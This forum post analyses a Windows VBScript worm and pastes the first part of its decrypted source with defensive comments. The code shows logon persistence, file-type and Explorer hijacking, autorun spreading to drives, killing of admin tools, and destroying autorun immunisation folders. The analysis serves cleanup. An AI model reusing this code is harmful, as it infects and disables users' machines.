
主题:个人经验总结帖,内容不定,不定期更新 -- 休眠火山

家园 关于smss.exe 后边是.vbs文件的病毒(续)

杀完了以后,下面讲讲这个病毒本身。这个病毒隐藏自身非常巧妙,据我分析它是利用了NTFS分区的数据流(ADS)功能把自身附加到了系统程序的后边。需要说明一点:下面贴出的这一段代码里,只能看到它在InvadeSystem里按系统盘是否为NTFS来决定要不要给病毒文件加隐藏属性,真正生成病毒文件路径的GetMainVirus等函数在下一页,流的具体用法要结合那部分看。至于"只要启动系统就自动中毒",从代码看靠的是两条路:一是把自身路径写进HKEY_CURRENT_USER\...\Windows NT\CurrentVersion\Windows\Load这个登录时自动加载的键值;二是劫持txt/ini/inf/bat/cmd/reg/chm/hlp这些文件类型以及IE和"我的电脑"的打开命令,用户一打开这些东西就会先执行病毒,再由病毒去调用正常的程序。

好吧,我承认我已经把这个病毒解密了。这个病毒实际上比较简单,为什么杀毒软件不认呢,是因为病毒每次传染的时候都要用新的随机码对自身重新加密,静态特征码每次都不一样。vbs病毒有个致命缺陷,就是脚本引擎只认明码,所以运行之前必须先把自己解密成明码。这样我们就可以通过解密(或者直接在它解密之后把明码导出来)看到病毒的明码,再据此对病毒进行杀毒处理。

首先,我要表示一下失望,因为我以为这个病毒能够几层嵌套来加密,结果只有一层。

其次,试着贴病毒程序代码内容(注意:下面这段只是第一部分,Main里调用的Run、GetMainVirus,以及InvadeSystem用到的CreateAutoRun、InfectRoot、各个Set*FileAss、SetHiddenAttr、GetCode、GetVersion、GetInfectedDate等函数都在后面一页;另外贴出来的代码里CreateFile出现了两次,InvadeSystem里比较Load键值的那一行末尾多了一个`&`,看起来是贴代码时出的错,不影响理解):

' --- Malware analysis annotation (defensive; do not run) ---
' Top-level setup for the worm: suppress every runtime error, then create the
' two COM objects used throughout (FileSystemObject and WScript.Shell).
' The ProgIDs are deliberately written in mixed case; ProgID lookup is
' case-insensitive, so this only serves to dodge naive string signatures.
On Error Resume Next
Dim Fso,WshShell
Set Fso=CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")
Set WshShell=CreateObject("wScRipT.SHelL")
' Entry point. On the no-argument path Main ends in MonitorSystem, whose
' Do...Loop has no exit, so this call normally never returns.
Call Main()
Sub Main()
' Dispatcher. The last three characters of the joined command line decide
' which "decoy" action to perform (so the user sees the program they expected),
' after which the infection is refreshed and a second copy of the script is
' launched under the copied host at %SystemRoot%\system\svchost.exe.
' Run, GetMainVirus and InvadeSystem's helpers are not in this excerpt.
' ArgNum, Param, SubParam and RunPath are never declared (no Option Explicit).
 On Error Resume Next
 Dim Args, VirusLoad, VirusAss
 Set Args=WScript.Arguments
 VirusLoad=GetMainVirus(1)
 VirusAss=GetMainVirus(0)
 ArgNum=0
 Do While ArgNum < Args.Count
 Param=Param&" "&Args(ArgNum)
 ArgNum=ArgNum + 1
 Loop
' Only the trailing 3 chars are inspected: for hijacked file types this is the
' opened file's extension, for the IE / My Computer hooks it is a fixed tag
' ("OIE", "OMC", "EMC") appended by InvadeSystem.
SubParam=LCase(Right(Param, 3))
Select Case SubParam
Case "run"
' Left(...,2) is the script's drive letter, e.g. "E:" -- presumably the
' autorun.inf entry point (CreateAutoRun is on the next page; unconfirmed).
RunPath=Left(WScript.ScriptFullName, 2)
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "txt", "log","ini" ,"inf"
' Decoy: open the requested document in Notepad so nothing looks wrong.
RunPath="%SystemRoot%\system32\NOTEPAD.EXE "&Param
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "bat", "cmd"
' The batch file is NOT executed; a taunting console window is shown instead.
RunPath="CMD /c echo Hi!I'm here!&pause"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "reg"
RunPath="regedit.exe "&""""&Trim(Param)&""""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "chm"
RunPath="hh.exe "&""""&Trim(Param)&""""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "hlp"
RunPath="winhlp32.exe "&""""&Trim(Param)&""""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "dir"
' Strips the "dir" tag and runs whatever path precedes it, quoted.
RunPath=""""&Left(Trim(Param),Len(Trim(Param))-3)&""""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "oie"
RunPath="""%ProgramFiles%\Internet Explorer\IEXPLORE.EXE"""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "omc"
' {20D04FE0-...} is the My Computer shell folder CLSID.
RunPath="explorer.exe /n,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "emc"
RunPath="explorer.exe /n,/e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case Else
' Resident path (e.g. started from the Windows\Load value, which carries no
' argument). PreDblInstance is not in this excerpt.
If PreDblInstance=True Then
WScript.Quit
End If
' Time-bomb: weeks since the recorded infection date minus 12; the payload
' only fires after that and only on dates where month = day (1/1, 2/2 ... 12/12).
Timeout = Datediff("ww", GetInfectedDate, Date) - 12
If Timeout>0 And Month(Date) = Day(Date) Then
Call VirusAlert()
Call MakeJoke(CInt(Month(Date)))
End If
' Never returns.
call MonitorSystem()
End Select
End Sub
Sub MonitorSystem()
' Resident watchdog loop, run every 3 seconds, forever (no exit condition):
'  1. kill the listed admin tools so the user cannot inspect or undo it;
'  2. re-run InvadeSystem, restoring files and registry hooks;
'  3. make sure at least two script instances are alive (see KeepProcess).
' Cleanup therefore has to stop every wscript/svchost host first.
' ExeFullNames is declared but unused; VBSFullNames is used but undeclared.
On Error Resume Next
Dim ProcessNames, ExeFullNames
ProcessNames=Array("cmd.exe","cmd.com","regedit.exe","regedit.scr","regedit.pif","regedit.com","msconfig.exe")
VBSFullNames=Array(GetMainVirus(1))
Do
Call KillProcess(ProcessNames)
Call InvadeSystem(GetMainVirus(1),GetMainVirus(0))
Call KeepProcess(VBSFullNames)
WScript.Sleep 3000
Loop
End Sub
Sub InvadeSystem(VirusLoadPath,VirusAssPath)
' Installs or repairs the infection and re-asserts every persistence hook.
' Called from every branch of Main and every 3 s from MonitorSystem, so any
' partial manual cleanup is undone almost at once while a copy is running.
' VirusLoadPath / VirusAssPath come from GetMainVirus (next page, not here).
On Error Resume Next
Dim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, Version
' Expected contents of the hooked registry values. Each one below is
' re-written whenever the live value differs, not only on first install.
Load_Value=""""&VirusLoadPath&""""
' Hijacked file-type commands launch the script through the real WScript.exe,
' passing the opened file along as %1 %* so Main can open it as a decoy.
File_Value="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" %1 %* "
IE_Value="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" OIE "
MyCpt_Value1="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" OMC "
MyCpt_Value2="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" EMC "
' Persistence: the per-user Windows\Load value is run at logon. Ver and Date
' are bookkeeping for the upgrade check and the time-bomb in Main.
' HCUDate is not in the Dim list above (undeclared, tolerated by VBScript).
HCULoad="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
HCUVer="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"
HCUDate="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"
' Reads its own source for replication. GetCode is not in this excerpt, so
' whether the per-infection re-encryption happens here cannot be confirmed.
VirusCode=GetCode(WScript.ScriptFullName)
Version=1
' GetSpecialFolder(1) is System32, GetSpecialFolder(0) is %SystemRoot%.
' The genuine script host is copied to %SystemRoot%\system\svchost.exe -- a
' look-alike of the real svchost.exe (which lives in system32). That path is
' a reliable cleanup indicator.
HostSourcePath=Fso.GetSpecialFolder(1)&"\Wscript.exe"
HostFilePath=Fso.GetSpecialFolder(0)&"\system\svchost.exe"
' Propagation: every ready removable (1), fixed (2) or network (3) drive gets
' an autorun entry plus a copy named after the volume serial number
' (CreateAutoRun / InfectRoot / GetSerialNumber are on the next page).
For Each Drive In Fso.Drives
If Drive.IsReady and (Drive.DriveType=1 Or Drive.DriveType=2 Or Drive.DriveType=3) Then
DiskVirusName=GetSerialNumber(Drive.DriveLetter)&".vbs"
Call CreateAutoRun(Drive.DriveLetter,DiskVirusName)
Call InfectRoot(Drive.DriveLetter,DiskVirusName)
End If
Next
' (Re)install when any of the three components is missing or the recorded
' version is older than this script's.
If FSO.FileExists(VirusAssPath)=False Or FSO.FileExists(VirusLoadPath)=False Or FSO.FileExists(HostFilePath)=False Or GetVersion()< Version Then
' Only difference between the branches: on NTFS the two .vbs copies are NOT
' given the hidden attribute. Presumably the NTFS paths from GetMainVirus are
' hidden by other means (the post says via NTFS streams) -- that code is not
' visible here, so treat it as unconfirmed.
If GetFileSystemType(GetSystemDrive())="NTFS" Then
Call CreateFile(VirusCode,VirusAssPath)
Call CreateFile(VirusCode,VirusLoadPath)
Call CopyFile(HostSourcePath,HostFilePath)
Call SetHiddenAttr(HostFilePath)
Else
Call CreateFile(VirusCode, VirusAssPath)
Call SetHiddenAttr(VirusAssPath)
Call CreateFile(VirusCode,VirusLoadPath)
Call SetHiddenAttr(VirusLoadPath)
Call CopyFile(HostSourcePath, HostFilePath)
Call SetHiddenAttr(HostFilePath)
End If
End If
' NOTE(review): the stray "&" before "Then" is most likely a transcription
' error in the posted listing rather than part of the original script.
If ReadReg(HCULoad)<>Load_Value& Then
Call WriteReg (HCULoad, Load_Value, "")
End If
If GetVersion() < Version Then
Call WriteReg (HCUVer, Version, "")
End If
If GetInfectedDate() = "" Then
Call WriteReg (HCUDate, Date, "")
End If
' Hooks, each restored on every pass: shell\open\command of eight file types,
' IE (both the Applications key and the desktop-icon CLSID's OpenHomePage
' verb) and the My Computer CLSID's open/explore verbs. The Set*Ass helpers
' are on the next page. A complete cleanup must restore all of these.
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>File_Value Then
Call SetTxtFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command\")<>File_Value Then
Call SetIniFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command\")<>File_Value Then
Call SetInfFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\")<>File_Value Then
Call SetBatFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\")<>File_Value Then
Call SetCmdFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>File_Value Then
Call SetRegFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>File_Value Then
Call SetchmFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>File_Value Then
Call SethlpFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command\")<>IE_Value Then
Call SetIEAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\")<>IE_Value Then
Call SetIEAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\")<>MyCpt_Value1 Then
Call SetMyComputerAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\")<>MyCpt_Value2 Then
Call SetMyComputerAss(VirusAssPath)
End If
' Explorer / AutoRun tampering, see RegSet.
Call RegSet()
End Sub
Sub CopyFile(source, pathf)
' Overwriting copy: deletes any existing target (force-deleting read-only
' files) and then copies source over it. Used to plant the renamed script
' host at %SystemRoot%\system\svchost.exe. Errors are silently ignored.
On Error Resume Next
If FSO.FileExists(pathf) Then
FSO.DeleteFile pathf , True
End If
FSO.CopyFile source, pathf
End Sub
Sub CreateFile(code, pathf)
' Writes the script body (code) to pathf, truncating an existing file
' (mode 2 = ForWriting) or creating it when absent. Both branches do the same
' thing; the only difference is the "create" flag passed to OpenTextFile.
' This Sub appears twice in the posted listing -- VBScript would refuse a
' redefined name, so the duplicate is almost certainly a paste artifact.
On Error Resume Next
Dim FileText
If FSO.FileExists(pathf) Then
Set FileText=FSO.OpenTextFile(pathf, 2, False)
FileText.Write code
FileText.Close
Else
Set FileText=FSO.OpenTextFile(pathf, 2, True)
FileText.Write code
FileText.Close
End If
End Sub
Sub CreateFile(code, pathf)
' Duplicate of the CreateFile definition immediately above (identical body).
' Most likely introduced when the listing was pasted; a real VBScript file
' with two Subs of the same name would not run.
On Error Resume Next
Dim FileText
If FSO.FileExists(pathf) Then
Set FileText=FSO.OpenTextFile(pathf, 2, False)
FileText.Write code
FileText.Close
Else
Set FileText=FSO.OpenTextFile(pathf, 2, True)
FileText.Write code
FileText.Close
End If
End Sub
Sub RegSet()
' Explorer / AutoRun tampering, re-applied on every InvadeSystem pass:
'  RegPath1/2 -- the Folder Options "Hidden files" radio buttons. Rewriting
'    their CheckedValue entries keeps "Show hidden files" from taking effect;
'    a clean system has NOHIDDEN=2 and SHOWALL=1, which cleanup should restore.
'  RegPath3 -- NoDriveTypeAutoRun=0 enables AutoRun on every drive type, so
'    the autorun.inf dropped on removable disks is honoured.
'  RegPath4 -- deleting lnkfile\IsShortcut removes the shortcut overlay arrow,
'    presumably so planted .lnk files look like ordinary files (unconfirmed).
On Error Resume Next
Dim RegPath1 , RegPath2, RegPath3, RegPath4
RegPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue"
RegPath2="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
RegPath3="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"
RegPath4="HKEY_CLASSES_ROOT\lnkfile\IsShortcut"
Call WriteReg (RegPath1, 3, "REG_DWORD")
Call WriteReg (RegPath2, 2, "REG_DWORD")
Call WriteReg (RegPath3, 0, "REG_DWORD")
Call DeleteReg (RegPath4)
End Sub
Sub KillProcess(ProcessNames)
' Terminates every running process whose image name is in ProcessNames,
' looked up via WMI Win32_Process. If Terminate reports failure, it falls
' back to attaching the ntsd debugger with "-c q" (quit), which ends the
' debuggee as a side effect -- a second way to kill a process that resists
' WMI termination. Used by MonitorSystem against cmd/regedit/msconfig.
On Error Resume Next
Set WMIService=GetObject("winmgmts:\\.\root\cimv2")
For Each ProcessName in ProcessNames 
Set ProcessList=WMIService.execquery(" Select * From win32_process where name ='"&ProcessName&"' ")
For Each Process in ProcessList
IntReturn=Process.terminate
If intReturn<>0 Then
WshShell.Run "CMD /c ntsd -c q -p "&Process.Handle, vbHide, False
End If
Next
Next
End Sub
Sub KillImmunity(D)
' Defeats the common "Autorun.inf folder" immunisation (an undeletable folder
' placed on a drive so a worm cannot write its own autorun.inf): grants
' Everyone full control with CACLS, then removes the folder tree. D is a
' drive letter. Not called anywhere in this excerpt.
On Error Resume Next
ImmunityFolder=D&":\Autorun.inf"
If Fso.FolderExists(ImmunityFolder) Then
WshSHell.Run ("CMD /C CACLS "& """"&ImmunityFolder&"""" &" /t /e /c /g everyone:f"),vbHide,True
WshSHell.Run ("CMD /C RD /S /Q "& ImmunityFolder), vbHide, True
End If
End Sub
Sub KeepProcess(VBSFullNames)
' Keeps at least two instances of each listed script alive: when
' VBSProcessCount (not in this excerpt) reports fewer than 2, another copy
' is started through the renamed host at %SystemRoot%\system\svchost.exe.
' This is why killing a single wscript/svchost process does not stop it.
On Error Resume Next
For Each VBSFullName in VBSFullNames 
If VBSProcessCount(VBSFullName) < 2 then
Run("%SystemRoot%\system\svchost.exe "&VBSFullName)
End If
Next
End Sub
' Returns the system drive as "X:" -- the first two characters of
' GetSpecialFolder(0), i.e. %SystemRoot%.
Function GetSystemDrive()
GetSystemDrive=Left(Fso.GetSpecialFolder(0),2)
End Function
' Returns the file-system name (e.g. "NTFS") of the given drive. No error
' handling of its own; callers rely on On Error Resume Next.
Function GetFileSystemType(Drive)
Set d=FSO.GetDrive(Drive)
GetFileSystemType=d.FileSystem
End Function
' Reads a registry value via a fresh WScript.Shell (the global WshShell is
' not reused). No error handling here: a missing key raises, which callers
' mask with On Error Resume Next, leaving the return value empty.
Function ReadReg(strkey)
Dim tmps
Set tmps=CreateObject("WScript.Shell")
ReadReg=tmps.RegRead(strkey)
Set tmps=Nothing
End Function
' Writes a registry value. When vtype is empty, RegWrite is called without a
' type argument (WSH's default type); otherwise vtype (e.g. "REG_DWORD") is
' passed through. Used for both persistence and the Explorer tampering.
Sub WriteReg(strkey, Value, vtype)
Dim tmps
Set tmps=CreateObject("WScript.Shell")
If vtype="" Then
tmps.RegWrite strkey, Value
Else
tmps.RegWrite strkey, Value, vtype
End If
Set tmps=Nothing
End Sub
' Deletes a registry value or key (RegDelete). Only caller in this excerpt
' is RegSet, removing lnkfile\IsShortcut.
Sub DeleteReg(strkey)
Dim tmps
Set tmps=CreateObject("WScript.Shell")
tmps.RegDelete strkey
Set tmps=Nothing
End Sub

字数限制,必须分页了。



